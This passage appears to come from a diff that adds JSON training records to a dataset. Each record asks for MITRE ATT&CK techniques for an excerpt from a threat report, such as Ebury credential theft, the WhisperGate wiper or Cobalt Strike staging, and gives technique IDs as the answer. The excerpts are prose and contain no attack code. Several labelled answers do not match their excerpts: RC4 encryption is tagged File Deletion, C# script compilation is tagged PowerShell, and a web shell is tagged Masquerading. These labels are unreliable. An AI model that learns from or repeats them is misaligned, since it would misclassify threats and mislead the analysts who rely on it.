Steal contacts from an address book, steals SMS messages, steals images, and more. An attacker within one mile of the target could use their own Bluetooth-enabled device for this. If the second computer is using a secured network and was infected through a USB connection, potentially the only network available would be a Bluetooth connection back to the first compromised computer\"", + "output": "- T1011.001: Exfiltration Over Other Network Medium - Exfiltration Over Bluetooth" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class", + "output": "- T1560.002: Archive Collected Data - Archive via Library" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On top of this configuration change, this sample does not use the libcurl library for network exfiltration. Instead, it uses an external library. To locate it, the backdoor tries to decrypt each file in the current directory using AES-256-CBC with the key gFjMXBgyXWULmVVVzyxy padded with zeroes. Each file is \u201cdecrypted\u201d and saved as /tmp/store and an attempt to load it as a library made using the dlopen function. When a decryption attempt results in a successful call to dlopen, the backdoor then retrieves the exported functions Boriry and ChadylonV, which seem to be responsible for the network communication with the server. As we do not have the dropper or other files from the original sample\u2019s location, we could not analyse this library. Moreover, since the component is encrypted, a YARA rule based on these strings would not match the file found on disk", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\\ partition by overwriting it with fixed data. The additional steps taken to wipe the actual hard drive partition differentiate its behavior from other wiper malware like NotPetya. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable", + "output": "- T1542.003: Pre-OS Boot - Bootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All this data is merged in one file xmlrwbin.inc, which is then encrypted with RC4. To be able to decipher the data, the attacker should certainly know either the MD5 hash or the whole buffer content. This data is also sent, but RSA encrypted. The malware constructs a 1120 bit public key, uses it to encrypt the 117-bytes buffer. The malware then concatenates all the data to be sent as a 128-bytes block. The resulting data is saved in C:Program FilesCommon FilesSystemOle DB to a file named according to the following format", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The file reflectively injects a ransomware DLL into the memory of the legitimate running process explorer.exe", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We also noticed that the\u00a0actors reused the\u00a0VBS decode function\u00a0published by\u00a0Motobit. Figure 4 shows the comparison between the\u00a0base64\u00a0function used in the macro code and the VBS\u00a0base64\u00a0decoder function published by\u00a0Motobit", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Inception is continuing to use chains of infected routers to act as proxies and mask communications between the attackers and the cloud service providers they use. Certain router manufacturers have UPnP listening on WAN as a default configuration. These routers are hijacked by Inception and configured to forward traffic from one port to another host on the internet. Abuse of this service requires no custom malware to be injected on the routers and can be used at scale very easily. Inception strings chains of these routers together to create multiple proxies to hide behind", + "output": "- T1090.003: Proxy - Multi-hop Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the /tmp folder", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While both malware families are designed to deploy Cobalt Strike Beacon, there are differences in Cobalt Strike configuration. To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Nonetheless, the infected DLL contains just one method (named DynamicRun), that can receive a C# script from a web request, compile it on the fly, and execute it", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "There are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI", + "output": "- T1137.004: Office Application Startup - Outlook Home Page" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hashing algorithm generates a CRC32 hash of the string, converted to lowercase. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules. The hash algorithm has been replicated in Python below", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Targets are approached with spearphishing emails that contain a link to a ZIP file hosted on Google Drive. That archive contains several LNK (aka shortcut) files that extract and execute a malicious JavaScript component, while displaying a decoy document", + "output": "- T1204.001: User Execution - Malicious Link\n- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Throughout our research, we witnessed several different infection chains being used to deliver the Aria-body backdoor. This RTF file, which was infected (weaponized) with the RoyalRoad exploit builder, drops a loader named intel.wll into the target PC\u2019s Word startup folder. The loader in turn tries to download and execute the next stage payload from spool.jtjewifyn[.]com", + "output": "- T1137.006: Office Application Startup - Add-ins" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Both variants build their API imports dynamically using GetProcAddress, including wtsapi32.dll for gathering user and domain names for any active remote sessions - Both variants contain a variety of functionalities based on command IDs issued by the control servers - Common capabilities of both malware: Listing files in directory Creating arbitrary processes Writing data received from control servers to files on disk Gathering information for all drives Gathering process times for all processes Sending the contents of a specific file to the control server Wiping and deleting files on disk Setting the current working directory for the implant Sending disk space information to the control server - Listing files in directory - Creating arbitrary processes - Writing data received from control servers to files on disk - Gathering information for all drives - Gathering process times for all processes - Sending the contents of a specific file to the control server - Wiping and deleting files on disk - Setting the current working directory for the implant - Sending disk space information to the control server - Both variants use a batch file mechanism to delete their binaries from the system - Both variants run commands on the system, log output to a temporary file, and send the contents of the file to their control servers", + "output": "- T1082: System Information Discovery\n- T1057: Process Discovery\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Password from successful login to the infected server: Whenever someone logs in a system infected with Linux/Ebury, the\u00a0sshd\u00a0daemon will save the password and send it to the exfiltration server. Password on successful login from the infected server: When someone uses the\u00a0ssh\u00a0client on an infected server, Linux/Ebury will intercept the password and sent it to its exfiltration server. Private key passphrase: When the\u00a0ssh\u00a0client on an infected server prompts the user for an private key passphrase, the passphrase will be sent to the remote exfiltration server. Unencrypted private key: When a private key is used to authenticate to a remote server, the unencrypted version is intercepted by the malware. Unlike passwords, it will not send the key to the exfiltration server. Instead, it will store it memory and wait for the operators to fetch the key with the\u00a0Xcat\u00a0command. Private keys added to the OpenSSH agent with\u00a0ssh-add: The keys added to an OpenSSH agent are also intercepted by the malware. Both the unencrypted key itself and the passphrase typed by the user will be logged", + "output": "- T1552.004: Unsecured Credentials - Private Keys" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named \u201cvmtoolsd. Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name \u2018MSASCuiLTasks\u2019 in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence. Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Raindrop is compiled as a DLL, which is built from a modified version of 7-Zip source code. The 7-Zip code is not utilized and is designed to hide malicious functionality added by the attackers. The DLL is compiled where the Name file of the Export Directory Table is \u201c\"\"7-zip.dll\"\" and the Export Names are\"", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Tools and binaries used by the attackers (e.g. ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. Before running intensive and continued hands-on keyboard activity, the attackers took care of disabling event logging using AUDITPOL and re-enabling it afterward. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services. We believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The sample arrives as an app bundled in a Zip archive. It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unlike a Docker engine that runs on a single host, a Kubernetes cluster typically contains more than one host and every host can run multiple containers. Given the abundant resources in a Kubernetes infrastructure, a hijacked Kubernetes cluster can be more profitable than a hijacked Docker host. This new TeamTNT malware campaign is one of the most complicated attacks targeting Kubernetes. This is also the most feature-rich malware we have seen from TeamTNT so far. In particular, the threat actor has developed more sophisticated tactics for initial access, execution, defense evasion and C2. Although the malware is still under development and the campaign is not yet widely spread, we believe the attacker will soon mature the tools and start a large-scale deployment", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell. The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The instrumentor script also performs a cleanup of the cookies for Google Chrome and Microsoft Edge browsers. This is done by simply terminating any browser processes running on the system and then deleting the cookie files on disk", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "They renamed their files to make them look like legitimate files, for example, trilog.exe, named after a legitimate Schneider Electric application", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Much like the known actors Miniduke or CommentCrew, it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Posted by Sergei Shevchenko at Labels: Agent.btz Newer Post Older Post Home", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Seaduke delivery The attackers control Cozyduke via compromised websites, issuing instructions to infected machines by uploading \u201ctasks\u201d to a database file. Cozyduke will periodically contact these websites to retrieve task information to be executed on the local machine. One such task (an encoded PowerShell script) instructed Cozyduke to download and execute Seaduke from a compromised website", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Persistence: Creates a Windows RUN registry key for persistence. The name of the key is: \"\"Dropbox Update Setup\"\". This name was consistent in all the samples. This key points to the location of the Python-compiled binary in the %appdata% directory to ensure that it is started automatically each time the system is\u00a0rebooted\"", + "output": "- T1036.004: Masquerading - Masquerade Task or Service\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The samples install\u00a0HTTPBrowser at %APPDATA%/wdm.exe. Persistence is established via the HKCUSoftwareMicrosoftWindowsCurrentVersionRun key value for wdm\u00a0set to the path of the executable. Previous samples have set persistence via Run key values for 360v", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. Running in RAM Cobalt Strike modules aren't stored in the file system; their executable code can only be found in RAM. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP/HTTPS/DNS modules and SMB modules. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP/HTTPS/DNS module. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Connect to another computer using PsExec.exe (the remote access program is included in the Microsoft SysInternals suite), copy the module, and run it; delete the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed", + "output": "- T1219: Remote Access Software" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A configuration file resides in a file under the backdoor\u2019s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values \u20180\u2019 or \u20181\u2019 and also adds itself to the configuration file. Other than the state command, all commands in the configuration file are identified by their hash\u2019s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows. The exploit uses CVE-2015-1701 to execute a callback in userspace. The callback gets the EPROCESS structures of the current process and the System process, and copies data from the System token into the token of the current process. Upon completion, the payload continues execution in usermode with the privileges of the System process", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network\u2019s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router", + "output": "- T1021.004: Remote Services - SSH" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The RDAT sample with the novel EWS C2 channel also had HTTP and DNS tunneling as C2 channels as well, which are very similar to other RDAT samples we collected. The HTTP C2 channel uses HTTP POST requests to transmit data to the C2 server", + "output": "- T1030: Data Transfer Size Limits" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additionally, Microsoft warned that this vulnerability could be used in the crafting of a wormable exploit. The Common Vulnerabilities and Exposures (CVE) site references this vulnerability as CVE-2008-4250", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": 